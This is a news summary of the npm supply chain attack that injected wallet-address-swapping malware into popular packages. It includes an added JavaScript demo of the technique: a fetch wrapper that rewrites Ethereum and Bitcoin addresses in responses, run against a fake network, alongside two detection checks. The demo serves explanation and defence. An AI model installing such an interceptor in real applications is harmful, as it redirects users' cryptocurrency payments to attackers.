Hackers hijack npm packages with 2 billion weekly downloads in supply chain attack www.bleepingcomputer.com/news/secu…
In what is being called the largest supply chain attack in history, attackers injected malware into npm packages with a combined 2.6 billion weekly downloads after taking over a maintainer's account through a phishing attack.
The malicious code affects only users who load an application built with the compromised packages in a web browser. It injects itself into the page and watches for Ethereum, Bitcoin, Solana, Tron, Litecoin and Bitcoin Cash wallet addresses and transfers. When a network response contains a cryptocurrency transaction, it swaps the destination for an attacker-controlled address, so the transaction is hijacked before the user signs it.
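The interception pattern described above, as an added example that is neither the article's text nor the actual malicious payload: it simulates a tampered fetch() that rewrites wallet addresses in a response body, and pairs it with two checks a practitioner can run. The address regexes, the attacker addresses and the sample response are constructed for this demo, only two of the six currencies the article names are modelled, and the details of the real payload beyond what the article states are not reproduced. Assumes Node 18+ or a browser; no network access is needed.

```javascript
// Added example, not code from the article or from the compromised packages.
// Simulates the browser-side interception technique: a wrapper over fetch()
// that rewrites wallet addresses in responses, plus two defensive checks.

// Simplified patterns for two of the currencies named in the article
// (assumption: the real payload covers more chains and address formats).
const ADDRESS_PATTERNS = {
  ethereum: /\b0x[0-9a-fA-F]{40}\b/g,
  bitcoin: /\bbc1[02-9ac-hj-np-z]{25,59}\b/g, // bech32 charset only
};

// Attacker-controlled destinations: constructed placeholders, not real wallets.
const ATTACKER_ADDRESSES = {
  ethereum: '0x' + 'ab'.repeat(20),
  bitcoin: 'bc1q' + 'z'.repeat(38),
};

// Interception step: replace every address found in a response body with the
// attacker's address for the same currency.
function rewriteAddresses(text, attackerAddresses = ATTACKER_ADDRESSES) {
  let out = text;
  for (const [chain, pattern] of Object.entries(ADDRESS_PATTERNS)) {
    out = out.replace(pattern, attackerAddresses[chain]);
  }
  return out;
}

// Wrap a fetch-like function so that text() and json() on its responses
// return rewritten bodies. A compromised package would install this over
// window.fetch; here it wraps whatever implementation it is given.
function wrapFetch(fetchImpl, attackerAddresses = ATTACKER_ADDRESSES) {
  return async function fetch(input, init) {
    const response = await fetchImpl(input, init);
    const originalText = response.text.bind(response);
    response.text = async () => rewriteAddresses(await originalText(), attackerAddresses);
    response.json = async () => JSON.parse(await response.text());
    return response;
  };
}

// Check 1 (browser side): a genuine window.fetch is a native function, while a
// JavaScript wrapper prints its own source. toString is taken from
// Function.prototype so a wrapper cannot hide by overriding its own toString.
// Note: Node's global fetch is itself written in JavaScript, so this check is
// only meaningful in a browser; the test below uses Array.prototype.map.
function isNativeFunction(fn) {
  return typeof fn === 'function' &&
    /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Check 2 (wallet side): compare the destination the user entered with the one
// about to be signed. The swap happens between the network layer and signing,
// so this is where it becomes visible. Ethereum addresses are case-insensitive
// (EIP-55 only adds a checksum); base58 and bech32 addresses are compared as-is.
function destinationMatches(intended, toSign) {
  const norm = (a) => {
    const s = a.trim();
    return /^0x[0-9a-fA-F]{40}$/.test(s) ? s.toLowerCase() : s;
  };
  return norm(intended) === norm(toSign);
}

// Constructed sample: a payment-quote JSON body such as a dapp might fetch.
const LEGIT_ETH = '0x' + '11'.repeat(20);
const LEGIT_BTC = 'bc1q' + 'd'.repeat(38);
const SAMPLE_BODY = JSON.stringify({
  asset: 'ETH',
  amount: '0.5',
  to: LEGIT_ETH,
  btcFallback: LEGIT_BTC,
});

// Run the tampered fetch against a fake network and apply both checks.
async function demo() {
  const fakeFetch = async () => ({ status: 200, text: async () => SAMPLE_BODY });
  const tamperedFetch = wrapFetch(fakeFetch);
  const quote = await (await tamperedFetch('https://example.invalid/quote')).json();
  return {
    swappedTo: quote.to,                      // attacker's ETH address
    swappedBtc: quote.btcFallback,            // attacker's BTC address
    wrapperLooksNative: isNativeFunction(tamperedFetch), // false
    destinationOk: destinationMatches(LEGIT_ETH, quote.to), // false: swap detected
  };
}

demo().then((result) => console.log(result));
```

In a browser, `isNativeFunction(window.fetch)` returning false at page load is a useful signal, but only a heuristic: polyfills and monitoring agents also wrap fetch, and a payload can hook other entry points (XMLHttpRequest, wallet provider objects) that this check does not cover. The destination comparison is the more robust control, because the article places the swap before signing: whatever rewrote the response, the address shown for confirmation must match the one the user intended.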
This supply chain attack follows a series of similar attacks targeting developers of various well-known JavaScript libraries over the past few months. For instance, in July, attackers compromised eslint-config-prettier, a package with over 30 million weekly downloads, while in March, ten other widely used npm libraries were hijacked and turned into info-stealers.